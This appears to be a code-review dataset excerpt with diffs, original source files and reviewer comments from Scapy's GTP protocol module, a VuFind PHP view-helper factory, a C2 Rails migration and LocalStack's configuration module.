Location Information" fields_desc = [ByteEnumField("ietype", 152, IEType), ShortField("length", None), ByteField("type", 1), # Only type 1 is currently supported TBCDByteField("MCC", "", 2), # MNC: if the third digit of MCC is 0xf, then the length of MNC is 1 byte # noqa: E501 TBCDByteField("MNC", "", 1), ShortField("LAC", None), ShortField("SAC", None)] class IE_MSTimeZone(IE_Base): name = "MS Time Zone" fields_desc = [ByteEnumField("ietype", 153, IEType), ShortField("length", None), ByteField("timezone", 0), BitField("Spare", 0, 1), BitField("Spare", 0, 1), BitField("Spare", 0, 1), BitField("Spare", 0, 1), BitField("Spare", 0, 1), BitField("Spare", 0, 1), 
XBitField("daylight_saving_time", 0x00, 2)] class IE_IMEI(IE_Base): name = "IMEI" fields_desc = [ByteEnumField("ietype", 154, IEType), ShortField("length", None), TBCDByteField("IMEI", "", length_from=lambda x: x.length)] class IE_MSInfoChangeReportingAction(IE_Base): name = "MS Info Change Reporting Action" fields_desc = [ByteEnumField("ietype", 181, IEType), ShortField("length", 1), ByteField("Action", 0)] class IE_DirectTunnelFlags(IE_Base): name = "Direct Tunnel Flags" fields_desc = [ByteEnumField("ietype", 182, IEType), ShortField("length", 1), BitField("Spare", 0, 1), BitField("Spare", 0, 1), BitField("Spare", 0, 1), BitField("Spare", 0, 1), BitField("Spare", 0, 1), BitField("EI", 0, 1), BitField("GCSI", 0, 1), BitField("DTI", 0, 1)] class IE_BearerControlMode(IE_Base): name = "Bearer Control Mode" fields_desc = [ByteEnumField("ietype", 184, IEType), ShortField("length", 1), ByteField("bearer_control_mode", 0)] class IE_EvolvedAllocationRetentionPriority(IE_Base): name = "Evolved Allocation/Retention Priority" fields_desc = [ByteEnumField("ietype", 191, IEType), ShortField("length", 1), BitField("Spare", 0, 1), BitField("PCI", 0, 1), XBitField("PL", 0x0000, 4), BitField("Spare", 0, 1), BitField("PVI", 0, 1)] class IE_CharginGatewayAddress(IE_Base): name = "Chargin Gateway Address" fields_desc = [ByteEnumField("ietype", 251, IEType), ShortField("length", 4), ConditionalField(IPField("ipv4_address", "127.0.0.1"), lambda pkt: pkt.length == 4), ConditionalField(IP6Field("ipv6_address", "::1"), lambda pkt: pkt.length == 16)] class IE_PrivateExtension(IE_Base): name = "Private Extension" fields_desc = [ByteEnumField("ietype", 255, IEType), ShortField("length", 1), ByteField("extension identifier", 0), StrLenField("extention_value", "", length_from=lambda x: x.length)] class IE_ExtensionHeaderList(IE_Base): name = "Extension Header List" fields_desc = [ByteEnumField("ietype", 141, IEType), FieldLenField("length", None, length_of="extension_headers"), # noqa: E501 
FieldListField("extension_headers", [64, 192], ByteField("", 0))] # noqa: E501 class IE_NotImplementedTLV(Packet): name = "IE not implemented" fields_desc = [ByteEnumField("ietype", 0, IEType), ShortField("length", None), StrLenField("data", "", length_from=lambda x: x.length)] def extract_padding(self, pkt): return "", pkt ietypecls = {1: IE_Cause, 2: IE_IMSI, 3: IE_Routing, 8: IE_ReorderingRequired, 14: IE_Recovery, 15: IE_SelectionMode, 16: IE_TEIDI, 17: IE_TEICP, 19: IE_Teardown, 20: IE_NSAPI, 26: IE_ChargingCharacteristics, 27: IE_TraceReference, 28: IE_TraceType, 127: IE_ChargingId, 128: IE_EndUserAddress, 131: IE_AccessPointName, 132: IE_ProtocolConfigurationOptions, 133: IE_GSNAddress, 134: IE_MSInternationalNumber, 135: IE_QoS, 141: IE_ExtensionHeaderList, 148: IE_CommonFlags, 149: IE_APNRestriction, 151: IE_RATType, 152: IE_UserLocationInformation, 153: IE_MSTimeZone, 154: IE_IMEI, 181: IE_MSInfoChangeReportingAction, 182: IE_DirectTunnelFlags, 184: IE_BearerControlMode, 191: IE_EvolvedAllocationRetentionPriority, 251: IE_CharginGatewayAddress, 255: IE_PrivateExtension} def IE_Dispatcher(s): """Choose the correct Information Element class.""" if len(s) < 1: return Raw(s) # Get the IE type ietype = orb(s[0]) cls = ietypecls.get(ietype, Raw) # if ietype greater than 128 are TLVs if cls == Raw and ietype & 128 == 128: cls = IE_NotImplementedTLV return cls(s) class GTPEchoResponse(Packet): # 3GPP TS 29.060 V9.1.0 (2009-12) name = "GTP Echo Response" fields_desc = [PacketListField("IE_list", [], IE_Dispatcher)] def hashret(self): return struct.pack("H", self.seq) def answers(self, other): return self.seq == other.seq class GTPCreatePDPContextRequest(Packet): # 3GPP TS 29.060 V9.1.0 (2009-12) name = "GTP Create PDP Context Request" fields_desc = [PacketListField("IE_list", [IE_TEIDI(), IE_NSAPI(), IE_GSNAddress(length=4, ipv4_address=RandIP()), # noqa: E501 IE_GSNAddress(length=4, ipv4_address=RandIP()), # noqa: E501 IE_NotImplementedTLV(ietype=135, length=15, 
data=RandString(15))], # noqa: E501 IE_Dispatcher)] def hashret(self): return struct.pack("H", self.seq) class GTPCreatePDPContextResponse(Packet): # 3GPP TS 29.060 V9.1.0 (2009-12) name = "GTP Create PDP Context Response" fields_desc = [PacketListField("IE_list", [], IE_Dispatcher)] def hashret(self): return struct.pack("H", self.seq) def answers(self, other): return self.seq == other.seq class GTPUpdatePDPContextRequest(Packet): # 3GPP TS 29.060 V9.1.0 (2009-12) name = "GTP Update PDP Context Request" fields_desc = [PacketListField("IE_list", [ IE_Cause(), IE_Recovery(), IE_TEIDI(), IE_TEICP(), IE_ChargingId(), IE_ProtocolConfigurationOptions(), IE_GSNAddress(), IE_GSNAddress(), IE_GSNAddress(), IE_GSNAddress(), IE_QoS(), IE_CharginGatewayAddress(), IE_CharginGatewayAddress(), IE_CommonFlags(), IE_APNRestriction(), IE_BearerControlMode(), IE_MSInfoChangeReportingAction(), IE_EvolvedAllocationRetentionPriority(), IE_PrivateExtension()], IE_Dispatcher)] def hashret(self): return struct.pack("H", self.seq) class GTPUpdatePDPContextResponse(Packet): # 3GPP TS 29.060 V9.1.0 (2009-12) name = "GTP Update PDP Context Response" fields_desc = [PacketListField("IE_list", None, IE_Dispatcher)] def hashret(self): return struct.pack("H", self.seq) class GTPErrorIndication(Packet): # 3GPP TS 29.060 V9.1.0 (2009-12) name = "GTP Error Indication" fields_desc = [PacketListField("IE_list", [], IE_Dispatcher)] class GTPDeletePDPContextRequest(Packet): # 3GPP TS 29.060 V9.1.0 (2009-12) name = "GTP Delete PDP Context Request" fields_desc = [PacketListField("IE_list", [], IE_Dispatcher)] class GTPDeletePDPContextResponse(Packet): # 3GPP TS 29.060 V9.1.0 (2009-12) name = "GTP Delete PDP Context Response" fields_desc = [PacketListField("IE_list", [], IE_Dispatcher)] class GTPPDUNotificationRequest(Packet): # 3GPP TS 29.060 V9.1.0 (2009-12) name = "GTP PDU Notification Request" fields_desc = [PacketListField("IE_list", [IE_IMSI(), IE_TEICP(TEICI=RandInt()), 
IE_EndUserAddress(PDPTypeNumber=0x21), # noqa: E501 IE_AccessPointName(), IE_GSNAddress(ipv4_address="127.0.0.1"), # noqa: E501 ], IE_Dispatcher)] class GTPSupportedExtensionHeadersNotification(Packet): name = "GTP Supported Extension Headers Notification" fields_desc = [PacketListField("IE_list", [IE_ExtensionHeaderList(), ], IE_Dispatcher)] class GTPmorethan1500(Packet): # 3GPP TS 29.060 V9.1.0 (2009-12) name = "GTP More than 1500" fields_desc = [ByteEnumField("IE_Cause", "Cause", IEType), BitField("IE", 1, 12000), ] # Bind GTP-C bind_bottom_up(UDP, GTPHeader, dport=2123) bind_bottom_up(UDP, GTPHeader, sport=2123) bind_layers(UDP, GTPHeader, dport=2123, sport=2123) bind_layers(GTPHeader, GTPEchoRequest, gtp_type=1, S=1) bind_layers(GTPHeader, GTPEchoResponse, gtp_type=2, S=1) bind_layers(GTPHeader, GTPCreatePDPContextRequest, gtp_type=16) bind_layers(GTPHeader, GTPCreatePDPContextResponse, gtp_type=17) bind_layers(GTPHeader, GTPUpdatePDPContextRequest, gtp_type=18) bind_layers(GTPHeader, GTPUpdatePDPContextResponse, gtp_type=19) bind_layers(GTPHeader, GTPDeletePDPContextRequest, gtp_type=20) bind_layers(GTPHeader, GTPDeletePDPContextResponse, gtp_type=21) bind_layers(GTPHeader, GTPPDUNotificationRequest, gtp_type=27) bind_layers(GTPHeader, GTPSupportedExtensionHeadersNotification, gtp_type=31, S=1) # noqa: E501 bind_layers(GTPHeader, GTP_UDPPort_ExtensionHeader, next_ex=64, E=1) bind_layers(GTPHeader, GTP_PDCP_PDU_ExtensionHeader, next_ex=192, E=1) # Bind GTP-U bind_bottom_up(UDP, GTP_U_Header, dport=2152) bind_bottom_up(UDP, GTP_U_Header, sport=2152) bind_layers(UDP, GTP_U_Header, dport=2152, sport=2152) bind_layers(GTP_U_Header, GTPErrorIndication, gtp_type=26, S=1) bind_layers(GTP_U_Header, GTPPDUSessionContainer, gtp_type=255, E=1, next_ex=0x85) bind_top_down(GTP_U_Header, IP, gtp_type=255) bind_top_down(GTP_U_Header, IPv6, gtp_type=255) bind_top_down(GTP_U_Header, PPP, gtp_type=255)
1
17,405
You probably don't want to assume that `self.underlayer` has a `seq` attribute.
secdev-scapy
py
@@ -65,10 +65,6 @@ class DisplayLanguageOptionFactory implements FactoryInterface if (!empty($options)) { throw new \Exception('Unexpected options sent to factory.'); } - // We want to construct a separate translator instance for this helper, - // since it configures different language/locale than the core shared - // instance! - $factory = new \VuFind\I18n\Translator\TranslatorFactory(); - return new $requestedName($factory($container, Translator::class)); + return new $requestedName($container->get(Translator::class)); } }
1
<?php /** * DisplayLanguageOption helper factory. * * PHP version 7 * * Copyright (C) Villanova University 2018. * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License version 2, * as published by the Free Software Foundation. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA * * @category VuFind * @package View_Helpers * @author Demian Katz <[email protected]> * @license http://opensource.org/licenses/gpl-2.0.php GNU General Public License * @link https://vufind.org/wiki/development Wiki */ namespace VuFind\View\Helper\Root; use Interop\Container\ContainerInterface; use Interop\Container\Exception\ContainerException; use Laminas\Mvc\I18n\Translator; use Laminas\ServiceManager\Exception\ServiceNotCreatedException; use Laminas\ServiceManager\Exception\ServiceNotFoundException; use Laminas\ServiceManager\Factory\FactoryInterface; /** * DisplayLanguageOption helper factory. * * @category VuFind * @package View_Helpers * @author Demian Katz <[email protected]> * @license http://opensource.org/licenses/gpl-2.0.php GNU General Public License * @link https://vufind.org/wiki/development Wiki */ class DisplayLanguageOptionFactory implements FactoryInterface { /** * Create an object * * @param ContainerInterface $container Service manager * @param string $requestedName Service being created * @param null|array $options Extra options (optional) * * @return object * * @throws ServiceNotFoundException if unable to resolve the service. 
* @throws ServiceNotCreatedException if an exception is raised when * creating a service. * @throws ContainerException&\Throwable if any other error occurs */ public function __invoke(ContainerInterface $container, $requestedName, array $options = null ) { if (!empty($options)) { throw new \Exception('Unexpected options sent to factory.'); } // We want to construct a separate translator instance for this helper, // since it configures different language/locale than the core shared // instance! $factory = new \VuFind\I18n\Translator\TranslatorFactory(); return new $requestedName($factory($container, Translator::class)); } }
1
31,547
This apparently breaks the language selection.
vufind-org-vufind
php
@@ -0,0 +1,10 @@ +# This migration comes from acts_as_taggable_on_engine (originally 5) +# This migration is added to circumvent issue #623 and have special characters +# work properly +class ChangeCollationForTagNames < ActiveRecord::Migration + def up + if ActsAsTaggableOn::Utils.using_mysql? + execute("ALTER TABLE tags MODIFY name varchar(255) CHARACTER SET utf8 COLLATE utf8_bin;") + end + end +end
1
1
15,431
since we're not using mysql, do we need this migration?
18F-C2
rb
@@ -453,6 +453,9 @@ OUTBOUND_HTTP_PROXY = os.environ.get("OUTBOUND_HTTP_PROXY", "") # Equivalent to HTTPS_PROXY, but only applicable for external connections OUTBOUND_HTTPS_PROXY = os.environ.get("OUTBOUND_HTTPS_PROXY", "") +# Whether to enable the partition adjustment listener (in order to support other partitions that the default) +PARTITION_ADJUSTMENT = is_env_true("PARTITION_ADJUSTMENT") + # list of environment variable names used for configuration. # Make sure to keep this in sync with the above! # Note: do *not* include DATA_DIR in this list, as it is treated separately
1
import logging import os import platform import re import socket import subprocess import tempfile import time from typing import Any, Dict, List, Mapping, Tuple import six from boto3 import Session from localstack.constants import ( AWS_REGION_US_EAST_1, DEFAULT_BUCKET_MARKER_LOCAL, DEFAULT_DEVELOP_PORT, DEFAULT_LAMBDA_CONTAINER_REGISTRY, DEFAULT_PORT_EDGE, DEFAULT_SERVICE_PORTS, FALSE_STRINGS, INSTALL_DIR_INFRA, LOCALHOST, LOCALHOST_IP, LOG_LEVELS, TRACE_LOG_LEVELS, TRUE_STRINGS, ) # keep track of start time, for performance debugging load_start_time = time.time() class Directories: """ Holds the different directories available to localstack. Some directories are shared between the host and the localstack container, some live only on the host and some only in the container. Attributes: static_libs: container only; binaries and libraries statically packaged with the image var_libs: shared; binaries and libraries+data computed at runtime: lazy-loaded binaries, ssl cert, ... cache: shared; ephemeral data that has to persist across localstack runs and reboots tmp: shared; ephemeral data that has to persist across localstack runs but not reboots functions: shared; volume to communicate between host<->lambda containers data: shared; holds localstack state, pods, ... config: host only; pre-defined configuration values, cached credentials, machine id, ... 
init: shared; user-defined provisioning scripts executed in the container when it starts logs: shared; log files produced by localstack """ static_libs: str var_libs: str cache: str tmp: str functions: str data: str config: str init: str logs: str # these are the folders mounted into the container by default when the CLI is used default_bind_mounts = ["var_libs", "cache", "tmp", "data", "init", "logs"] def __init__( self, static_libs: str = None, var_libs: str = None, cache: str = None, tmp: str = None, functions: str = None, data: str = None, config: str = None, init: str = None, logs: str = None, ) -> None: super().__init__() self.static_libs = static_libs self.var_libs = var_libs self.cache = cache self.tmp = tmp self.functions = functions self.data = data self.config = config self.init = init self.logs = logs @staticmethod def from_config(): """Returns Localstack directory paths from the config/environment variables defined by the config.""" return Directories( static_libs=INSTALL_DIR_INFRA, var_libs=TMP_FOLDER, # TODO: add variable cache=CACHE_DIR, tmp=TMP_FOLDER, # TODO: should inherit from root value for /var/lib/localstack (e.g., MOUNT_ROOT) functions=HOST_TMP_FOLDER, # TODO: rename variable/consider a volume data=DATA_DIR, config=CONFIG_DIR, init=None, # TODO: introduce environment variable logs=TMP_FOLDER, # TODO: add variable ) @staticmethod def for_container() -> "Directories": """ Returns Localstack directory paths as they are defined within the container. Everything shared and writable lives in /var/lib/localstack or /tmp/localstack. 
:returns: Directories object """ # only set CONTAINER_VAR_LIBS_FOLDER/CONTAINER_CACHE_FOLDER inside the container to redirect var_libs/cache to # another directory to avoid override by host mount var_libs = ( os.environ.get("CONTAINER_VAR_LIBS_FOLDER", "").strip() or "/var/lib/localstack/var_libs" ) cache = os.environ.get("CONTAINER_CACHE_FOLDER", "").strip() or "/var/lib/localstack/cache" return Directories( static_libs=INSTALL_DIR_INFRA, var_libs=var_libs, cache=cache, tmp=TMP_FOLDER, # TODO: move to /var/lib/localstack/tmp - or /tmp/localstack functions=HOST_TMP_FOLDER, # TODO: move to /var/lib/localstack/tmp data=DATA_DIR, # TODO: move to /var/lib/localstack/data config=None, # config directory is host-only logs="/var/lib/localstack/logs", init="/docker-entrypoint-initaws.d", ) def mkdirs(self): for folder in [ self.static_libs, self.var_libs, self.cache, self.tmp, self.functions, self.data, self.config, self.init, self.logs, ]: if folder and not os.path.exists(folder): try: os.makedirs(folder) except Exception: # this can happen due to a race condition when starting # multiple processes in parallel. 
Should be safe to ignore pass def __str__(self): return str(self.__dict__) def eval_log_type(env_var_name): """get the log type from environment variable""" ls_log = os.environ.get(env_var_name, "").lower().strip() return ls_log if ls_log in LOG_LEVELS else False def is_env_true(env_var_name): """Whether the given environment variable has a truthy value.""" return os.environ.get(env_var_name, "").lower().strip() in TRUE_STRINGS def is_env_not_false(env_var_name): """Whether the given environment variable is empty or has a truthy value.""" return os.environ.get(env_var_name, "").lower().strip() not in FALSE_STRINGS def load_environment(profile: str = None): """Loads the environment variables from ~/.localstack/{profile}.env :param profile: the profile to load (defaults to "default") """ if not profile: profile = "default" path = os.path.join(CONFIG_DIR, f"{profile}.env") if not os.path.exists(path): return import dotenv dotenv.load_dotenv(path, override=False) # the configuration profile to load CONFIG_PROFILE = os.environ.get("CONFIG_PROFILE", "").strip() # host configuration directory CONFIG_DIR = os.environ.get("CONFIG_DIR", os.path.expanduser("~/.localstack")) # keep this on top to populate environment try: load_environment(CONFIG_PROFILE) except ImportError: # dotenv may not be available in lambdas or other environments where config is loaded pass # java options to Lambda LAMBDA_JAVA_OPTS = os.environ.get("LAMBDA_JAVA_OPTS", "").strip() # limit in which to kinesalite will start throwing exceptions KINESIS_SHARD_LIMIT = os.environ.get("KINESIS_SHARD_LIMIT", "").strip() or "100" # delay in kinesalite response when making changes to streams KINESIS_LATENCY = os.environ.get("KINESIS_LATENCY", "").strip() or "500" # Kinesis provider - either "kinesis-mock" or "kinesalite" KINESIS_PROVIDER = os.environ.get("KINESIS_PROVIDER") or "kinesis-mock" # default AWS region if "DEFAULT_REGION" not in os.environ: os.environ["DEFAULT_REGION"] = 
os.environ.get("AWS_DEFAULT_REGION") or AWS_REGION_US_EAST_1 DEFAULT_REGION = os.environ["DEFAULT_REGION"] # Whether or not to handle lambda event sources as synchronous invocations SYNCHRONOUS_SNS_EVENTS = is_env_true("SYNCHRONOUS_SNS_EVENTS") SYNCHRONOUS_SQS_EVENTS = is_env_true("SYNCHRONOUS_SQS_EVENTS") SYNCHRONOUS_API_GATEWAY_EVENTS = is_env_not_false("SYNCHRONOUS_API_GATEWAY_EVENTS") SYNCHRONOUS_KINESIS_EVENTS = is_env_not_false("SYNCHRONOUS_KINESIS_EVENTS") SYNCHRONOUS_DYNAMODB_EVENTS = is_env_not_false("SYNCHRONOUS_DYNAMODB_EVENTS") # randomly inject faults to Kinesis KINESIS_ERROR_PROBABILITY = float(os.environ.get("KINESIS_ERROR_PROBABILITY", "").strip() or 0.0) # randomly inject faults to DynamoDB DYNAMODB_ERROR_PROBABILITY = float(os.environ.get("DYNAMODB_ERROR_PROBABILITY", "").strip() or 0.0) DYNAMODB_READ_ERROR_PROBABILITY = float( os.environ.get("DYNAMODB_READ_ERROR_PROBABILITY", "").strip() or 0.0 ) DYNAMODB_WRITE_ERROR_PROBABILITY = float( os.environ.get("DYNAMODB_WRITE_ERROR_PROBABILITY", "").strip() or 0.0 ) # JAVA EE heap size for dynamodb DYNAMODB_HEAP_SIZE = os.environ.get("DYNAMODB_HEAP_SIZE", "").strip() or "256m" # expose services on a specific host externally HOSTNAME_EXTERNAL = os.environ.get("HOSTNAME_EXTERNAL", "").strip() or LOCALHOST # expose SQS on a specific port externally SQS_PORT_EXTERNAL = int(os.environ.get("SQS_PORT_EXTERNAL") or 0) # name of the host under which the LocalStack services are available LOCALSTACK_HOSTNAME = os.environ.get("LOCALSTACK_HOSTNAME", "").strip() or LOCALHOST # host under which the LocalStack services are available from Lambda Docker containers HOSTNAME_FROM_LAMBDA = os.environ.get("HOSTNAME_FROM_LAMBDA", "").strip() # whether to remotely copy the lambda code or locally mount a volume LAMBDA_REMOTE_DOCKER = is_env_true("LAMBDA_REMOTE_DOCKER") # Marker name to indicate that a bucket represents the local file system. 
This is used for testing # Serverless applications where we mount the Lambda code directly into the container from the host OS. BUCKET_MARKER_LOCAL = ( os.environ.get("BUCKET_MARKER_LOCAL", "").strip() or DEFAULT_BUCKET_MARKER_LOCAL ) # network that the docker lambda container will be joining LAMBDA_DOCKER_NETWORK = os.environ.get("LAMBDA_DOCKER_NETWORK", "").strip() # custom DNS server that the docker lambda container will use LAMBDA_DOCKER_DNS = os.environ.get("LAMBDA_DOCKER_DNS", "").strip() # additional flags passed to Lambda Docker run/create commands LAMBDA_DOCKER_FLAGS = os.environ.get("LAMBDA_DOCKER_FLAGS", "").strip() # default container registry for lambda execution images LAMBDA_CONTAINER_REGISTRY = ( os.environ.get("LAMBDA_CONTAINER_REGISTRY", "").strip() or DEFAULT_LAMBDA_CONTAINER_REGISTRY ) # whether to remove containers after Lambdas finished executing LAMBDA_REMOVE_CONTAINERS = ( os.environ.get("LAMBDA_REMOVE_CONTAINERS", "").lower().strip() not in FALSE_STRINGS ) # directory for persisting data DATA_DIR = os.environ.get("DATA_DIR", "").strip() # folder for temporary files and data TMP_FOLDER = os.path.join(tempfile.gettempdir(), "localstack") # fix for Mac OS, to be able to mount /var/folders in Docker if TMP_FOLDER.startswith("/var/folders/") and os.path.exists("/private%s" % TMP_FOLDER): TMP_FOLDER = "/private%s" % TMP_FOLDER # temporary folder of the host (required when running in Docker). 
Fall back to local tmp folder if not set HOST_TMP_FOLDER = os.environ.get("HOST_TMP_FOLDER", TMP_FOLDER) # ephemeral cache dir that persists over reboots CACHE_DIR = os.environ.get("CACHE_DIR", os.path.join(TMP_FOLDER, "cache")).strip() # whether to enable verbose debug logging LS_LOG = eval_log_type("LS_LOG") DEBUG = is_env_true("DEBUG") or LS_LOG in TRACE_LOG_LEVELS # whether to enable debugpy DEVELOP = is_env_true("DEVELOP") # PORT FOR DEBUGGER DEVELOP_PORT = int(os.environ.get("DEVELOP_PORT", "").strip() or DEFAULT_DEVELOP_PORT) # whether to make debugpy wait for a debbuger client WAIT_FOR_DEBUGGER = is_env_true("WAIT_FOR_DEBUGGER") # whether to use SSL encryption for the services # TODO: this is deprecated and should be removed (edge port supports HTTP/HTTPS multiplexing) USE_SSL = is_env_true("USE_SSL") # whether to use the legacy single-region mode, defined via DEFAULT_REGION USE_SINGLE_REGION = is_env_true("USE_SINGLE_REGION") # whether to run in TF compatibility mode for TF integration tests # (e.g., returning verbatim ports for ELB resources, rather than edge port 4566, etc.) 
TF_COMPAT_MODE = is_env_true("TF_COMPAT_MODE") # default encoding used to convert strings to byte arrays (mainly for Python 3 compatibility) DEFAULT_ENCODING = "utf-8" # path to local Docker UNIX domain socket DOCKER_SOCK = os.environ.get("DOCKER_SOCK", "").strip() or "/var/run/docker.sock" # additional flags to pass to "docker run" when starting the stack in Docker DOCKER_FLAGS = os.environ.get("DOCKER_FLAGS", "").strip() # command used to run Docker containers (e.g., set to "sudo docker" to run as sudo) DOCKER_CMD = os.environ.get("DOCKER_CMD", "").strip() or "docker" # use the command line docker client instead of the new sdk version, might get removed in the future LEGACY_DOCKER_CLIENT = is_env_true("LEGACY_DOCKER_CLIENT") # whether to forward edge requests in-memory (instead of via proxy servers listening on backend ports) # TODO: this will likely become the default and may get removed in the future FORWARD_EDGE_INMEM = True # Default bind address for the edge service EDGE_BIND_HOST = os.environ.get("EDGE_BIND_HOST", "").strip() or "127.0.0.1" # port number for the edge service, the main entry point for all API invocations EDGE_PORT = int(os.environ.get("EDGE_PORT") or 0) or DEFAULT_PORT_EDGE # fallback port for non-SSL HTTP edge service (in case HTTPS edge service cannot be used) EDGE_PORT_HTTP = int(os.environ.get("EDGE_PORT_HTTP") or 0) # optional target URL to forward all edge requests to EDGE_FORWARD_URL = os.environ.get("EDGE_FORWARD_URL", "").strip() # IP of the docker bridge used to enable access between containers DOCKER_BRIDGE_IP = os.environ.get("DOCKER_BRIDGE_IP", "").strip() # whether to enable API-based updates of configuration variables at runtime ENABLE_CONFIG_UPDATES = is_env_true("ENABLE_CONFIG_UPDATES") # CORS settings DISABLE_CORS_CHECKS = is_env_true("DISABLE_CORS_CHECKS") DISABLE_CUSTOM_CORS_S3 = is_env_true("DISABLE_CUSTOM_CORS_S3") DISABLE_CUSTOM_CORS_APIGATEWAY = is_env_true("DISABLE_CUSTOM_CORS_APIGATEWAY") EXTRA_CORS_ALLOWED_HEADERS 
= os.environ.get("EXTRA_CORS_ALLOWED_HEADERS", "").strip() EXTRA_CORS_EXPOSE_HEADERS = os.environ.get("EXTRA_CORS_EXPOSE_HEADERS", "").strip() EXTRA_CORS_ALLOWED_ORIGINS = os.environ.get("EXTRA_CORS_ALLOWED_ORIGINS", "").strip() # whether to disable publishing events to the API DISABLE_EVENTS = is_env_true("DISABLE_EVENTS") DEBUG_ANALYTICS = is_env_true("DEBUG_ANALYTICS") # whether to eagerly start services EAGER_SERVICE_LOADING = is_env_true("EAGER_SERVICE_LOADING") # Whether to skip downloading additional infrastructure components (e.g., custom Elasticsearch versions) SKIP_INFRA_DOWNLOADS = os.environ.get("SKIP_INFRA_DOWNLOADS", "").strip() # whether to enable legacy record&replay persistence mechanism (default true, but will be disabled in a future release!) LEGACY_PERSISTENCE = is_env_not_false("LEGACY_PERSISTENCE") # Adding Stepfunctions default port LOCAL_PORT_STEPFUNCTIONS = int(os.environ.get("LOCAL_PORT_STEPFUNCTIONS") or 8083) # Stepfunctions lambda endpoint override STEPFUNCTIONS_LAMBDA_ENDPOINT = os.environ.get("STEPFUNCTIONS_LAMBDA_ENDPOINT", "").strip() # path prefix for windows volume mounting WINDOWS_DOCKER_MOUNT_PREFIX = os.environ.get("WINDOWS_DOCKER_MOUNT_PREFIX", "/host_mnt") # name of the main Docker container MAIN_CONTAINER_NAME = os.environ.get("MAIN_CONTAINER_NAME", "").strip() or "localstack_main" # the latest commit id of the repository when the docker image was created LOCALSTACK_BUILD_GIT_HASH = os.environ.get("LOCALSTACK_BUILD_GIT_HASH", "").strip() or None # the date on which the docker image was created LOCALSTACK_BUILD_DATE = os.environ.get("LOCALSTACK_BUILD_DATE", "").strip() or None # whether to skip S3 presign URL signature validation (TODO: currently enabled, until all issues are resolved) S3_SKIP_SIGNATURE_VALIDATION = is_env_not_false("S3_SKIP_SIGNATURE_VALIDATION") # whether to skip waiting for the infrastructure to shut down, or exit immediately FORCE_SHUTDOWN = is_env_not_false("FORCE_SHUTDOWN") # whether the in_docker check 
should always return true OVERRIDE_IN_DOCKER = is_env_true("OVERRIDE_IN_DOCKER") # whether to return mocked success responses for still unimplemented API methods MOCK_UNIMPLEMENTED = is_env_true("MOCK_UNIMPLEMENTED") def has_docker(): try: with open(os.devnull, "w") as devnull: subprocess.check_output("docker ps", stderr=devnull, shell=True) return True except Exception: return False def is_linux(): return platform.system() == "Linux" # whether to use Lambda functions in a Docker container LAMBDA_EXECUTOR = os.environ.get("LAMBDA_EXECUTOR", "").strip() if not LAMBDA_EXECUTOR: LAMBDA_EXECUTOR = "docker" if not has_docker(): LAMBDA_EXECUTOR = "local" # Fallback URL to use when a non-existing Lambda is invoked. If this matches # `dynamodb://<table_name>`, then the invocation is recorded in the corresponding # DynamoDB table. If this matches `http(s)://...`, then the Lambda invocation is # forwarded as a POST request to that URL. LAMBDA_FALLBACK_URL = os.environ.get("LAMBDA_FALLBACK_URL", "").strip() # Forward URL used to forward any Lambda invocations to an external # endpoint (can use useful for advanced test setups) LAMBDA_FORWARD_URL = os.environ.get("LAMBDA_FORWARD_URL", "").strip() # Time in seconds to wait at max while extracting Lambda code. # By default, it is 25 seconds for limiting the execution time # to avoid client/network timeout issues LAMBDA_CODE_EXTRACT_TIME = int(os.environ.get("LAMBDA_CODE_EXTRACT_TIME") or 25) # A comma-delimited string of stream names and its corresponding shard count to # initialize during startup. # For example: "my-first-stream:1,my-other-stream:2,my-last-stream:1" KINESIS_INITIALIZE_STREAMS = os.environ.get("KINESIS_INITIALIZE_STREAMS", "").strip() # URL to a custom elasticsearch backend cluster. If this is set to a valid URL, then localstack will not create # elasticsearch cluster instances, but instead forward all domains to the given backend. 
ES_CUSTOM_BACKEND = os.environ.get("ES_CUSTOM_BACKEND", "").strip() # Strategy used when creating elasticsearch domain endpoints routed through the edge proxy # valid values: domain | path | off ES_ENDPOINT_STRATEGY = os.environ.get("ES_ENDPOINT_STRATEGY", "").strip() or "domain" # Whether to start one cluster per domain (default), or multiplex domains to a single clusters ES_MULTI_CLUSTER = is_env_not_false("ES_MULTI_CLUSTER") # Equivalent to HTTP_PROXY, but only applicable for external connections OUTBOUND_HTTP_PROXY = os.environ.get("OUTBOUND_HTTP_PROXY", "") # Equivalent to HTTPS_PROXY, but only applicable for external connections OUTBOUND_HTTPS_PROXY = os.environ.get("OUTBOUND_HTTPS_PROXY", "") # list of environment variable names used for configuration. # Make sure to keep this in sync with the above! # Note: do *not* include DATA_DIR in this list, as it is treated separately CONFIG_ENV_VARS = [ "SERVICES", "HOSTNAME", "HOSTNAME_EXTERNAL", "LOCALSTACK_HOSTNAME", "LAMBDA_FALLBACK_URL", "LAMBDA_EXECUTOR", "LAMBDA_REMOTE_DOCKER", "LAMBDA_DOCKER_NETWORK", "LAMBDA_REMOVE_CONTAINERS", "USE_SSL", "USE_SINGLE_REGION", "DEBUG", "KINESIS_ERROR_PROBABILITY", "DYNAMODB_ERROR_PROBABILITY", "DYNAMODB_READ_ERROR_PROBABILITY", "DYNAMODB_WRITE_ERROR_PROBABILITY", "ES_CUSTOM_BACKEND", "ES_ENDPOINT_STRATEGY", "ES_MULTI_CLUSTER", "DOCKER_BRIDGE_IP", "DEFAULT_REGION", "LAMBDA_JAVA_OPTS", "LOCALSTACK_API_KEY", "LAMBDA_CONTAINER_REGISTRY", "TEST_AWS_ACCOUNT_ID", "DISABLE_EVENTS", "EDGE_PORT", "LS_LOG", "EDGE_PORT_HTTP", "EDGE_FORWARD_URL", "SKIP_INFRA_DOWNLOADS", "STEPFUNCTIONS_LAMBDA_ENDPOINT", "WINDOWS_DOCKER_MOUNT_PREFIX", "HOSTNAME_FROM_LAMBDA", "LOG_LICENSE_ISSUES", "SYNCHRONOUS_API_GATEWAY_EVENTS", "SYNCHRONOUS_KINESIS_EVENTS", "BUCKET_MARKER_LOCAL", "SYNCHRONOUS_SNS_EVENTS", "SYNCHRONOUS_SQS_EVENTS", "SYNCHRONOUS_DYNAMODB_EVENTS", "DYNAMODB_HEAP_SIZE", "MAIN_CONTAINER_NAME", "LAMBDA_DOCKER_DNS", 